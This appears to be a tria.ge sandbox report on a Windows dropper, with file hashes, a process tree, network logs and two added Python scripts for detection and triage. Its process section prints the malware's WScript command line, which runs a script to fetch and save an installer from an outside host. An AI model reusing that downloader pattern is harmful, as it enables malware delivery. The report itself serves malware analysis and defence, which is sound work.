Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    10/05/2024, 05:00 UTC

General

  • Target

    2d7a5218cf398889972c481ac03b4884_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    2d7a5218cf398889972c481ac03b4884

  • SHA1

    606db8a4498673c603cf3b03e6e6bf42d84c282c

  • SHA256

    02ceb479a7e2c6479c9f087a7584a8a7c875c9bacdbff33ac66c0c584839e5cf

  • SHA512

    b3d549c68ea0b7f27f8d69e616167e076e44f5635db6a7fb1a6f0747c2ac86997ea0e5dc2f7cc3b1095c494b7637a199d1deb5cbd293e9d6b16ff53914f7abff

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3E:/7BSH8zUB+nGESaaRvoB7FJNndnR

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2d7a5218cf398889972c481ac03b4884_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\2d7a5218cf398889972c481ac03b4884_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1948
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf120A.js" http://www.djapp.info/?domain=PpKiMVcnzr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf120A.exe
      2⤵
      • Blocklisted process makes network request
      PID:2228
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf120A.js" http://www.djapp.info/?domain=PpKiMVcnzr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf120A.exe
      2⤵
      • Blocklisted process makes network request
      PID:2652
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf120A.js" http://www.djapp.info/?domain=PpKiMVcnzr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf120A.exe
      2⤵
      • Blocklisted process makes network request
      PID:1264
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf120A.js" http://www.djapp.info/?domain=PpKiMVcnzr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf120A.exe
      2⤵
      • Blocklisted process makes network request
      PID:2156
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf120A.js" http://www.djapp.info/?domain=PpKiMVcnzr.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf120A.exe
      2⤵
      • Blocklisted process makes network request
      PID:2712
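The tree above is the whole story of this sample in five lines: the dropper writes a small JavaScript stage to %TEMP%, then runs it through WScript.exe with a staging URL and the path it should save the installer to, and repeats the launch five times when nothing comes back. The script below is an added example (not tria.ge code and not part of the sample) that turns that pattern into a reusable check: the command lines are reconstructed from the report, while the `SCRIPT_HOSTS`/`TEMP_SCRIPT` heuristics and all function names are this example's own.

```python
"""Spot the scripting-host launch pattern from the process tree above and pull
the installer parameters out of the URL argument.  Added example: the sample
command lines are reconstructed from the report; the heuristics and function
names are this example's own and are not part of tria.ge."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed from the Processes section: one parent, five identical children.
_WSCRIPT_CMD = (
    r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf120A.js" '
    r'http://www.djapp.info/?domain=PpKiMVcnzr.com&dotnet=4&file=installer'
    r'&ip=52.1.45.42:80&pub_id=101&setup_id=300 '
    r'C:\Users\Admin\AppData\Local\Temp\fuf120A.exe'
)
SAMPLE_PROCESSES = [
    {"pid": 1948, "ppid": None,
     "cmd": r'"C:\Users\Admin\AppData\Local\Temp\2d7a5218cf398889972c481ac03b4884_JaffaCakes118.exe"'},
] + [{"pid": pid, "ppid": 1948, "cmd": _WSCRIPT_CMD} for pid in (2228, 2652, 1264, 2156, 2712)]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Script file under the user's Temp directory, where droppers write their stage.
TEMP_SCRIPT = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\.(?:js|jse|vbs|vbe|wsf)$", re.I)


def tokenize(cmd):
    """Split a Windows command line into arguments, honouring double quotes."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', cmd)]


def detect_script_downloaders(processes):
    """Return one finding per scripting-host process that runs a script from
    %TEMP% and receives an http(s) URL on its command line."""
    findings = []
    for proc in processes:
        argv = tokenize(proc["cmd"])
        if not argv or argv[0].rsplit("\\", 1)[-1].lower() not in SCRIPT_HOSTS:
            continue
        scripts = [a for a in argv[1:] if TEMP_SCRIPT.search(a)]
        urls = [a for a in argv[1:] if a.lower().startswith(("http://", "https://"))]
        if not scripts or not urls:
            continue
        parts = urlsplit(urls[0])
        # Installer parameters (domain, dotnet, file, ip, pub_id, setup_id) are
        # plain query-string pairs; keep the first value of each.
        params = {k: v[0] for k, v in parse_qs(parts.query).items()}
        drop = next((a for a in argv[1:] if a.lower().endswith(".exe")), None)
        findings.append({
            "pid": proc["pid"], "ppid": proc["ppid"], "script": scripts[0],
            "host": parts.hostname, "url": urls[0], "params": params, "drop_path": drop,
        })
    return findings


def retries_by_parent(processes):
    """Count matching children per parent: repeated identical launches mean
    the stage never arrived and the dropper kept retrying."""
    counts = {}
    for f in detect_script_downloaders(processes):
        counts[f["ppid"]] = counts.get(f["ppid"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in detect_script_downloaders(SAMPLE_PROCESSES):
        print(f["pid"], f["host"], f["params"], "->", f["drop_path"])
    print("retries:", retries_by_parent(SAMPLE_PROCESSES))
```

The same three conditions (script host, script in %TEMP%, URL on the command line) translate directly into an EDR or Sysmon process-creation rule; the retry count is the extra signal that a plain image/argument match does not give you, since a legitimate one-off script rarely relaunches itself five times with identical arguments.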

Network

  • flag-us
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • flag-us
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • flag-us
    DNS
    bi.downthat.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    bi.downthat.com
    IN A
    Response
    bi.downthat.com
    IN CNAME
    traff-2.hugedomains.com
    traff-2.hugedomains.com
    IN CNAME
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    IN A
    3.130.253.23
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    IN A
    3.130.204.160
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Fri, 10 May 2024 05:00:45 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    DNS
    www.hugedomains.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.hugedomains.com
    IN A
    Response
    www.hugedomains.com
    IN A
    104.26.6.37
    www.hugedomains.com
    IN A
    104.26.7.37
    www.hugedomains.com
    IN A
    172.67.70.191
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.6.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Fri, 10 May 2024 05:00:46 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: site_version_phase=108; expires=Mon, 05-May-2025 05:00:46 GMT; path=/
    set-cookie: site_version=HDv3; expires=Mon, 05-May-2025 05:00:46 GMT; path=/
    set-cookie: captcha-tracker=; expires=Thu, 09-May-2024 05:00:46 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tlm4iOUzfm%2FaYqk2ZL3Rhvj7AZGwlLrJ0M6BVdc%2FjX34FIz3gnS8TOXgYDaIrVupnWrbBQVD7QyzO8%2FGK%2FEm6fEPZX17GZkTNZRRMUFvRntdiSBOjNdZfz4rIC6fgp1X5ieB4Js%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88175e178d7724e9-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Fri, 10 May 2024 05:00:51 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.6.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Fri, 10 May 2024 05:00:52 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: captcha-tracker=; expires=Thu, 09-May-2024 05:00:52 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dCzmsqjyfCzj6Gm5rbH%2FfVcwLtOKyxrAYiFCUZZDLPxk9IT5RUd%2BxX0sz93D4bT9esvHpfAztyvSX0IGUwbb0cuO%2FiFGenMRyyK0VpVjykjvCoAkkB7Fs4oB9c0GWRQqtW4Grfg%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88175e3aee3b48b6-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Fri, 10 May 2024 05:00:57 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.6.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Fri, 10 May 2024 05:00:58 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: captcha-tracker=; expires=Thu, 09-May-2024 05:00:58 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Errw6RM72%2FVG%2BGifcoX38ZrVuwSL%2FKEUZQERwmj65VHkB5uiqyao5JLLmCDmh9QDMI5xNkvRwiYAvGefAnuc6rkgrdWabE7BTGM1cZMnYQ%2FXN4fQXXzoawtpicXLJiG080NNpg%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88175e619a4a9577-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Fri, 10 May 2024 05:01:03 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.6.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Fri, 10 May 2024 05:01:04 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: captcha-tracker=; expires=Thu, 09-May-2024 05:01:04 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ffwLcJdYzbJ0qRp%2F9pPFTPLSQg2TMe6RZ%2BjKrPD0wchbQHVZ%2FN3xmFCWicl5GVPSW1NGsLXdB9%2Ft%2BoTcZnjf5TgajE9fhogimU9xnpIbnp254NFzft4gikUqnzfcnJ0GaDjyVIw%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88175e88bdf252db-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Fri, 10 May 2024 05:01:10 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.6.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Fri, 10 May 2024 05:01:11 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hOZuIL%2FdNPnrG%2FPaRULgThV9gU4K8EOsSCBLTASd4CjfX%2FZ1RkJkfsjWBDgLHdBean1hqtEcx8r21kSMCUBUDUcBitbvM%2BucGZFFzOF1UCs5sXBIymCnbaFqgcY26si1UeXXzsc%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88175eb02e377726-LHR
    Content-Encoding: gzip
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
    243 B
    5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.6.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.3kB
    10.3kB
    13
    15

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
    243 B
    5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.6.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.3kB
    9.2kB
    11
    13

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
    243 B
    5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.6.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.3kB
    9.2kB
    11
    13

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
    243 B
    5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.6.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.3kB
    9.1kB
    11
    13

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
    243 B
    5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.6.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.5kB
    16.2kB
    15
    21

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 8.8.8.8:53
    www.djapp.info
    dns
    WScript.exe
    120 B
    278 B
    2
    2

    DNS Request

    www.djapp.info

    DNS Request

    www.djapp.info

  • 8.8.8.8:53
    bi.downthat.com
    dns
    WScript.exe
    61 B
    191 B
    1
    1

    DNS Request

    bi.downthat.com

    DNS Response

    3.130.253.23
    3.130.204.160

  • 8.8.8.8:53
    www.hugedomains.com
    dns
    WScript.exe
    65 B
    113 B
    1
    1

    DNS Request

    www.hugedomains.com

    DNS Response

    104.26.6.37
    104.26.7.37
    172.67.70.191
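Read together, the records above say the stage never arrived: www.djapp.info returned no A record on either query, the script then reported a fetch failure to bi.downthat.com with the Windows error text in its query string, and that name now resolves through hugedomains.com and 302-redirects to a domain-for-sale page, so the five WScript launches produced five identical beacon pairs. The script below is an added example (not tria.ge code) that decodes the beacon and sorts the contacted names into dead, parked and shared-infrastructure buckets; the log entries are reconstructed from this Network section, and treating a redirect into `PARKING_HOSTS` as "parked" is this example's own assumption.

```python
"""Triage the DNS and HTTP records above: decode the script's error beacon and
work out which names are live, dead, or parked.  Added example: the log entries
are reconstructed from the report's Network section, and the parking-service
list is this example's own assumption, not a tria.ge feature."""
from urllib.parse import unquote, urlsplit

# Constructed from the Network section (CNAME chain collapsed to its targets).
DNS_LOG = [
    {"query": "www.djapp.info", "answers": []},
    {"query": "www.djapp.info", "answers": []},
    {"query": "bi.downthat.com", "answers": ["traff-2.hugedomains.com", "3.130.253.23", "3.130.204.160"]},
    {"query": "www.hugedomains.com", "answers": ["104.26.6.37", "104.26.7.37", "172.67.70.191"]},
]
HTTP_LOG = [
    {"url": "http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=",
     "status": 302, "location": "https://www.hugedomains.com/domain_profile.cfm?d=downthat.com"},
    {"url": "https://www.hugedomains.com/domain_profile.cfm?d=downthat.com",
     "status": 200, "location": None},
]

# Assumption: a redirect into this marketplace means the name is parked / for sale.
PARKING_HOSTS = ("hugedomains.com",)


def decode_error_beacon(url):
    """Split the beacon's query string by hand: one field is a bare
    percent-encoded error message with no '=', which parse_qs would mangle."""
    flags, messages = {}, []
    for part in urlsplit(url).query.split("&"):
        key, sep, value = part.partition("=")
        if sep:
            flags[unquote(key)] = unquote(value)
        else:
            messages.append(unquote(key))
    return {"flags": flags, "messages": messages}


def _is_parking(host):
    return host is not None and any(host == p or host.endswith("." + p) for p in PARKING_HOSTS)


def classify_hosts(dns_log, http_log):
    """unresolved: no answer ever came back (the stage host is dead);
    parked: resolves, but an HTTP hit 3xx-redirects into a parking service;
    parking-service: the marketplace itself (shared third-party infrastructure);
    resolved: anything else."""
    got_answer = {}
    for rec in dns_log:
        got_answer[rec["query"]] = got_answer.get(rec["query"], False) or bool(rec["answers"])
    parked = set()
    for rec in http_log:
        if 300 <= rec["status"] < 400 and _is_parking(urlsplit(rec["location"] or "").hostname):
            parked.add(urlsplit(rec["url"]).hostname)
    verdict = {}
    for name, ok in got_answer.items():
        if not ok:
            verdict[name] = "unresolved"
        elif name in parked:
            verdict[name] = "parked"
        elif _is_parking(name):
            verdict[name] = "parking-service"
        else:
            verdict[name] = "resolved"
    return verdict


def blocklist_candidates(verdicts):
    """Names the sample itself chose to contact; the parking service is
    shared infrastructure and is deliberately left out."""
    return sorted(n for n, v in verdicts.items() if v in {"unresolved", "parked"})


if __name__ == "__main__":
    print(decode_error_beacon(HTTP_LOG[0]["url"]))
    verdicts = classify_hosts(DNS_LOG, HTTP_LOG)
    print(verdicts, blocklist_candidates(verdicts))
```

The point of the split is what ends up on a blocklist: www.djapp.info and bi.downthat.com are the sample's own infrastructure and are worth blocking even though both are dead today, whereas www.hugedomains.com and the Cloudflare and AWS addresses behind it only appear because the actor's domain lapsed, and blocking them would generate noise without stopping anything.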

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    1KB

    MD5

    b6e71adf7324685d8f60c97bdb99f892

    SHA1

    ac45dd58c3dfb5d68ffdbc27817f1e5ad5720830

    SHA256

    40a181e9a8b85b862afc89a604eb290be3b5cd68937feb9ccfc467d3589e8e5c

    SHA512

    f864a712e300632059c0678ff5f54412fc7f7a1db02e469bcdc77be452886b55cd3d08ff51076278d1a21b091b2fc459e30c53b0d8e8855dbfefa59f0ee4cea9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    724B

    MD5

    8202a1cd02e7d69597995cabbe881a12

    SHA1

    8858d9d934b7aa9330ee73de6c476acf19929ff6

    SHA256

    58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

    SHA512

    97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    410B

    MD5

    cbe599fb8261a92646b4c7eb83343597

    SHA1

    a7a29639543b2f2be4c53ad89b3972f819f2f478

    SHA256

    f26e135b05da1dd76fcab475f2c99d26cbd516077b8203cf6bba50ca1b50fe2b

    SHA512

    78f9a9018613e605ccb01379f40010e46c07f630825637b85ba8629a80c7c0f4e694df1ad1d59d3de45095986e384a07bb21eac260a3c3dd5b99b6b76083ab26

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    b1933b7a3af87e9acc129f894e0da496

    SHA1

    7eec05a557f4dd4356cacbd19b51d5ccb4d1d4ef

    SHA256

    3b3bd57fd1880f76c31e413a0a655a2d523311ead52bfbda90b78e843af92eaf

    SHA512

